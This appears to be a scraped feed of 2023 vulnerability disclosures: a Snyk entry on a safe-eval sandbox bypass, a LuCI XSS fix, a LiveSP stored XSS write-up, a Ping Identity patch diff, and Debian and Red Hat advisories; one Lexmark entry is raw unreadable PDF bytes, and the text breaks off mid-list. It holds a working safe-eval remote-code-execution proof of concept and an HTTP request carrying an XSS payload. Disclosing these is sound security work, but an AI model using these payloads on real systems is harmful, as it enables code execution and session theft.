All versions of the package safe-eval are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation.Exploiting this vulnerability might result in remote code execution ("RCE").**Vulnerable functions:**__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(),  valueOf().

**Sandbox Bypass Affecting safe-eval package, versions **\*****

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   Snyk ID **SNYK-JS-SAFEEVAL-3373064**
*   published **10 Apr 2023**
*   disclosed **26 Mar 2023**
*   credit **seongil-wi**

**How to fix?**

There is no fixed version for safe-eval.

**Overview**

safe-eval is a Safer version of eval() Affected versions of this package are vulnerable to Sandbox Bypass due to improper input sanitization. The vulnerability is derived from prototype pollution exploitation. Exploiting this vulnerability might result in remote code execution ("RCE").

**Vulnerable functions:**

__defineGetter__, stack(), toLocaleString(), propertyIsEnumerable.call(), valueOf().

**PoC**

    
    const safe_eval = require('safe-eval')
    code = `
    import('test').catch((e)=>{})['constructor']['constructor']('return process')().mainModule.require('child_process').execSync('touch rce')
    `
    safe_eval(code)

CVE-2023-26122: Snyk Vulnerability Database | Snyk

LuCI openwrt-22.03 branch git-22.361.69894-438c598 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the component /system/sshkeys.js.

@@ -204,7 +204,7 @@ function removeKey(ev) {  
L.showModal(\_('Delete key'), \[ E('div', \_('Do you really want to delete the following SSH key?')), E('pre', delkey), E('pre', \[ delkey \]), E('div', { class: 'right' }, \[ E('div', { class: 'btn', click: L.hideModal }, \_('Cancel')), ' ',

CVE-2023-24182: luci-mod-system: fix potential stored XSS · openwrt/luci@0186d7e

A cross-site scripting (XSS) vulnerability in LiveAction LiveSP v21.1.2 allows attackers to execute arbitrary web scripts or HTML.

**CVE-2023-24721 - Stored Cross-site Scripting (XSS)**

  

**Description**

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

**POC**

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

**Affected Endpoint**

*   **URL:** https://\[ip:port\]/va/service/bach/topology/element
*   **HTTP Post Parameter:** name

**Technical Details**

In this specific instance, using the API available under _/va/service/bach/topology/element_, it is possible to inject arbitrary JavaScript code within the _name_ POST parameter, as shown in the following HTTP Request/Response pair.

**HTTP Request:**

POST /va/service/bach/topology/element HTTP/1.1
Host: \[REDACTED\]
Cookie: \[REDACTED\]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: \[REDACTED\]
X-Customer: \[REDACTED\]
Content-Type: application/json
Content-Length: 175
Origin: \[REDACTED\]
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"attributes":{"name":"\\"\><img src\='x' onerror\='alert(\\"pwned\\")'\>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":\[\]}}

**HTTP Response:**

HTTP/1.1 201 Created
Server: \[REDACTED\]
Date: Wed, 04 Jan 2023 13:45:39 GMT
Content-Type: application/json
Content-Length: 902
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers:Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken
Access-Control-Allow-Origin: \*
Referrer-Policy: strict-origin

\[...\]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the _https://\[hostname:port\]/va/cluster_ web page, the exploit runs from the victim’s browser.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721

CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

Certain Lexmark devices through 2023-02-19 access a Resource By Using an Incompatible Type.

%PDF-1.7 %���� 1 0 obj <>/Metadata 975 0 R/ViewerPreferences 976 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet\[/PDF/Text/ImageB/ImageC/ImageI\] >>/MediaBox\[ 0 0 612 792\] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x��\]mo�8�^�����Z�Ţ���nm���v׽n��&qNv����%ي)R�2����3�y!���O��˃��^���z}����Y����q�rf�\_�+gϟ��v��٫����r�vr���F9�Lf��r��%4���eߖ�������?�2z?�����>���x�G�7�|u��ǲ�ݎ'r4\_.J�݋���?�?{��z����p�XKz�X酕���x�kyY��^0�����ebodI�l��d8�\_�1����v���'j��ښ����\\���Օ�\[�ӯ\]����"��߈��^\[�<���23E�(.��g���@�^t�~:֣��\\���N�TW3\*���FŠ� �Qjs�F�}�ǖ�c;��D.$��6�v����),��̆Пз�|����)� \[���l:6���k�q5��)2���l��@�1j��F��S�w'L��iZ H0s&�.Yd\\��|s� �7�����L�� �7\`K��D���|�no.�p�S�������{�Iyɾ�r�6Wd�MfDD����j5?�#����"3<H5\*��8���y�~GE2Oa�� �+��3��x�u�� t�\`M�~��TxVdR��y��I6uxr�:��W�u Ne�c�qJi�"6yT�\*���m�N�;\*狛%�㙉���Dw@����BM�Ϫdh<�� �uI�g�X�|AY�}�.v����gj��@�dsv>+ghAW���J�t�( �7dG�55L��1ƛ�� K���\[�pT�5\*�¨p cH�4ʣ��4�� a�k/�"r\*X� 2�@���1a���M���DMM���H��d0&O���$\`��dk��5w�v���o��\[��nc��B���D���ѝx\_F���ct�kU&s�#C�J��P\`�&4HE�y&D�΅��G��A�\`�h|�G����X���G2���S�NJ�AFP�#cy��)�x�FdX��WQȃ\[VZ�����)6�4/2b���wH�ސ��Q,�:�BT�i���lW�����G7J��B�)��>�������?�����R��� �c%�������ݺLC#,E �W���&tͭ�6��u���L�@Ȋg6BU��<�p��X�\[\\��,狫jo���Sܒy�;A���-�'V./L%�gy���d/�����"�6F�-!9����=���\]\]e\*:���)p\*Qp���M�����������K4��/v�)YUc?�J���g��T;^T��\*��P��,�?I�u�'�.�^�"��N)��ԯܯ~���F%��}�og��=�Zb6�O��>�'��/��d�ٚ7&�66�E��ܬf HT~��J

CVE-2023-26063

A vulnerability, which was classified as problematic, has been found in Ping Identity Self-Service Account Manager 1.1.2. Affected by this issue is some unknown functionality of the file src/main/java/com/unboundid/webapp/ssam/SSAMController.java. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.1.3 is able to address this issue. The name of the patch is f64b10d63bb19ca2228b0c2d561a1a6e5a3bf251. It is recommended to upgrade the affected component. VDB-225362 is the identifier assigned to this vulnerability.

@@ -0,0 +1,44 @@

/\*

\* Copyright 2014-2017 Ping Identity Corporation

\* All Rights Reserved.

\*/

  

package com.unboundid.webapp.ssam;

  

import org.springframework.stereotype.Component;

import javax.servlet.FilterConfig;

import javax.servlet.ServletRequest;

import javax.servlet.ServletResponse;

import javax.servlet.FilterChain;

import javax.servlet.http.HttpServletResponse;

  

@Component

public class HTTPHeaderFilter implements javax.servlet.Filter {

public FilterConfig filterConfig;

  

public void doFilter(final ServletRequest request,

final ServletResponse response, FilterChain chain)

throws java.io.IOException, javax.servlet.ServletException {

  

HttpServletResponse res = (HttpServletResponse) response;

  

// Set this variable to the sha256 pin of your public key

// This value can be generated using the "openssl" command line tool

// https://developer.mozilla.org/en-US/docs/Web/HTTP/Public\_Key\_Pinning

String pinSha256 = "";

  

if(pinSha256.length() > 0)

{

res.setHeader("Public-Key-Pins", "max-age=518400; " +

"pin-sha256=\\"" + pinSha256 + "\\"; " +

"includeSubDomains");

}

  

chain.doFilter(request, response);

}

  

public void init(final FilterConfig filterConfig) { this.filterConfig = filterConfig; }

  

public void destroy() {}

  

}

@@ -0,0 +1,35 @@

/\*

\* Copyright 2014-2017 Ping Identity Corporation

\* All Rights Reserved.

\*/

  

package com.unboundid.webapp.ssam;

  

import org.springframework.stereotype.Component;

import javax.servlet.FilterConfig;

import javax.servlet.ServletRequest;

import javax.servlet.ServletResponse;

import javax.servlet.FilterChain;

import javax.servlet.http.HttpServletRequest;

  

@Component

public class HTTPRequestParameterFilter implements javax.servlet.Filter {

public FilterConfig filterConfig;

  

public void doFilter(final ServletRequest request,

final ServletResponse response, FilterChain chain)

throws java.io.IOException, javax.servlet.ServletException {

  

String curMethod = ((HttpServletRequest) request).getMethod();

//only allow for GET and POST requests.

if (curMethod.equalsIgnoreCase("get") || curMethod.equalsIgnoreCase("post"))

{

chain.doFilter(request, response);

}

}

  

public void init(final FilterConfig filterConfig) {

this.filterConfig = filterConfig;

}

public void destroy() {}

}

@@ -44,6 +44,7 @@

import org.springframework.web.bind.annotation.RequestParam;

import org.springframework.web.bind.annotation.ResponseBody;

import org.springframework.web.client.RestTemplate;

import org.springframework.web.util.HtmlUtils;

  

import com.fasterxml.jackson.annotation.JsonIgnoreProperties;

import com.fasterxml.jackson.annotation.JsonProperty;

@@ -971,7 +972,7 @@ private void populateUserModel(String username, Entry entry, Model model)

model.addAttribute("username", username);

for(Attribute attribute : entry.getAttributes())

{

model.addAttribute(attribute.getName(), attribute.getValue());

model.addAttribute(attribute.getName(), HtmlUtils.htmlEscape(attribute.getValue()));

}

model.addAttribute("entry", entry);

}

@@ -989,7 +990,7 @@ private void populateRegistrationModel(Map<String, String> parameters,

String value = parameter.getValue().trim();

if(!value.isEmpty())

{

model.addAttribute(name, value);

model.addAttribute(name, HtmlUtils.htmlEscape(value));

}

}

}

@@ -1,3 +1,12 @@

/\*

\* None style added to help with Frame Busting

\* intended for older browsers without 'X-Frame-Options' header support.

\* This method comes from an OWASP write up by Gustav Rydstedt.

\*/

html {

display: none;

}

  

.navbar-static-top {

margin-bottom: 19px;

}

@@ -0,0 +1,26 @@

// frame busting

function buster(document\_in, top\_in) {

if (self \=== top\_in) {

document\_in.documentElement.style.display \= "block";

} else {

top\_in.location \= self.location;

}

}

  

// html escaping for potentially unsafe jQuery methods such as ".append()"

var entityMap \= {

'&': '&amp;',

'<': '&lt;',

'>': '&gt;',

'"': '&quot;',

"'": '&#x27;',

'/': '&#x2F;',

'\`': '&#x60;',

'=': '&#x3D;'

};

  

function escapeHtml (string) {

return String(string).replace(/\[&<>"'\`=\\/\]/g, function (s) {

return entityMap\[s\];

});

}

@@ -25,7 +25,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -13,5 +13,9 @@

<div class="container">

Something went wrong: $!status $error

</div>

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

</body>

</html>

@@ -22,7 +22,7 @@

<label for="inputUsername" class="sr-only">Email/Username</label>

<input type="text" id="inputUsername" name="username" class="form-control" placeholder="Email/Username" required autofocus>

<label for="inputPassword" class="sr-only">Password</label>

<input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" required>

<input type="password" id="inputPassword" name="password" class="form-control" placeholder="Password" autocomplete="off" required>

<button class="btn btn-lg btn-primary btn-block" type="submit">Sign in</button>

<div style="margin-top: 5px;">

<a href="recoverPassword">Forgot password?</a>

@@ -31,6 +31,10 @@

</div>

</form>

</div>

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

</body>

@@ -25,7 +25,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script type="text/javascript">

$(document).ready(function() {

@@ -90,6 +90,10 @@

</div>

</div>

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -51,6 +51,10 @@

</div>

</div>

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -93,6 +93,10 @@

</div>

</div>

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -25,7 +25,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -56,7 +56,11 @@

</div>

</div>

</div>

  

  

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -113,20 +113,20 @@

<div class="form-group">

<label class="col-sm-4 control-label">Current Password </label>

<div class="col-sm-8">

<input id="currentPassword" type="password" class="form-control" placeholder="Enter Current Password">

<input id="currentPassword" type="password" class="form-control" placeholder="Enter Current Password" autocomplete="off"\>

</div>

</div>

<div class="form-group">

<label class="col-sm-4 control-label">Password </label>

<div class="col-sm-8">

<input id="password" type="password" class="form-control" placeholder="Enter New Password">

<input id="password" type="password" class="form-control" placeholder="Enter New Password" autocomplete="off"\>

#parse("\_password-requirements.vm")

</div>

</div>

<div class="form-group">

<label class="col-sm-4 control-label">Confirm&nbsp;Password </label>

<div class="col-sm-8">

<input id="confirmPassword" type="password" class="form-control" placeholder="Re-Enter New Password">

<input id="confirmPassword" type="password" class="form-control" placeholder="Re-Enter New Password" autocomplete="off"\>

</div>

</div>

</form>

@@ -161,6 +161,10 @@

</div>

</div>

#end

<script src="js/ssam-security-patch.js"></script>

<script type="text/javascript">

buster(document, top);

</script>

<script src="js/jquery-2.1.4.min.js"></script>

<script src="js/bootstrap.min.js"></script>

<script src="js/ssam.js"></script>

@@ -277,8 +281,8 @@

cn = first + " " + last;

}

var address = cn + '$' + $('input\[name="street"\]').val().trim() + '$' + $('input\[name="l"\]').val().trim() + ', ' + $('input\[name="st"\]').val().trim() + ' ' + $('input\[name="postalCode"\]').val().trim();

userForm.append('<input type="hidden" name="cn" value="' + cn + '">');

userForm.append('<input type="hidden" name="postalAddress" value="' + address + '">');

userForm.append('<input type="hidden" name="cn" value="' + escapeHtml(cn) + '">');

userForm.append('<input type="hidden" name="postalAddress" value="' + escapeHtml(address) + '">');

userForm.submit();

});

});

CVE-2018-25084: Added html escaping to help with XSS. Added frame busting to help wit… · pingidentity/ssam@f64b10d

Debian Linux Security Advisory 5384-1 - Multiple security vulnerabilities have been discovered in OpenImageIO, a library for reading and writing images. Buffer overflows and out-of-bounds read and write programming errors may lead to a denial of service (application crash) or the execution of arbitrary code if a malformed image file is processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5384-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 10, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openimageio  
CVE ID         : CVE-2022-36354 CVE-2022-41639 CVE-2022-41649 CVE-2022-41684  
                 CVE-2022-41794 CVE-2022-41837 CVE-2022-41838 CVE-2022-41977  
                 CVE-2022-41981 CVE-2022-41988 CVE-2022-41999 CVE-2022-43592  
                 CVE-2022-43593 CVE-2022-43594 CVE-2022-43595 CVE-2022-43596  
                 CVE-2022-43597 CVE-2022-43598 CVE-2022-43599 CVE-2022-43600  
                 CVE-2022-43601 CVE-2022-43602 CVE-2022-43603  
Debian Bug     : 1027143 1027808

Multiple security vulnerabilities have been discovered in OpenImageIO, a  
library for reading and writing images. Buffer overflows and out-of-bounds  
read and write programming errors may lead to a denial of service  
(application crash) or the execution of arbitrary code if a malformed image  
file is processed.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.2.10.1+dfsg-1+deb11u1.

We recommend that you upgrade your openimageio packages.

For the detailed security status of openimageio please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/openimageio

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQz0zJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeS2VhAAkzf+mdeKhMeJwj6tgMsq3GwyOvvyUwbCNxH31z43l+EX2SSLROOXfp8H  
N9pkxAPmMfkzNR77FFwKFyHmAMeHwQdO+9w4YQ+Bz2h1xs25snwW9k+4BFGvgZfc  
T4RF5l808YGPJWUoxS3EOfgVYAv7nYc/eSxHvLBSW/4uhsg9fzNeTvWbdGVATNDw  
2Fiy2b5uFeo+uBGveyhzd7sj+spe7cYdFklrSAirKA/QAh0cUlRVfP4uyQysO1iT  
/JK3+vXP+Xis7VmRADNLIfK8xnX5maW6Uru6IuHVHHFMqaSBYPw+1BwIfkz0n60A  
VL+wpVZ+eBdN1QM3srizcHfkB4ZuH/XU+NoNmKiCFPdmguwSPubH6NNEtqr4UHew  
29/PMcneOfGzjSf4tQ6Bk4wjhYEUOTiN3UAJ7Nc7xce92iapzzeHbulAMO9nROch  
KOUVyfauOBLWd5UTKSWGhlb/AWwGCBxhqBnumKRFS8t842xxsrMiufZBWM23q0fr  
smxfDs4uxUhmmQI4nCLUTCjLcFz50/flJNDKSTaRh5Vxu26wklxwFu0kFpiSxc2U  
3K6Ku+nH96ydlSjFLfKGP6L3+SPWzxaojpfxqgkjsA81k6/27arvamlZEb4+LC0D  
EuUmUYu9+6OYBmP6Qa/Awy+6tMX9x6DGtn2VOWpvyAD0xprGi0A=  
=mZTJ  
-----END PGP SIGNATURE-----

Debian Security Advisory 5384-1

Red Hat Security Advisory 2023-1549-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:1549-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1549  
Issue date:        2023-04-03  
CVE Names:         CVE-2023-1393   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local  
Privilege Escalation Vulnerability (CVE-2023-1393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2180288 - CVE-2023-1393 xorg-x11-server: X.Org Server Overlay Window Use-After-Free Local Privilege Escalation Vulnerability

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
tigervnc-1.9.0-15.el8_2.3.src.rpm

aarch64:  
tigervnc-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.aarch64.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.aarch64.rpm

noarch:  
tigervnc-icons-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-license-1.9.0-15.el8_2.3.noarch.rpm  
tigervnc-server-applet-1.9.0-15.el8_2.3.noarch.rpm

ppc64le:  
tigervnc-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.ppc64le.rpm  
tigervnc-server-module-debuginfo-1.9.0-15.el8_2.3.ppc64le.rpm

s390x:  
tigervnc-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.s390x.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.s390x.rpm

x86_64:  
tigervnc-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-debugsource-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-minimal-debuginfo-1.9.0-15.el8_2.3.x86_64.rpm  
tigervnc-server-module-1.9.0-15.el8_2.3.x86_64.rpm  
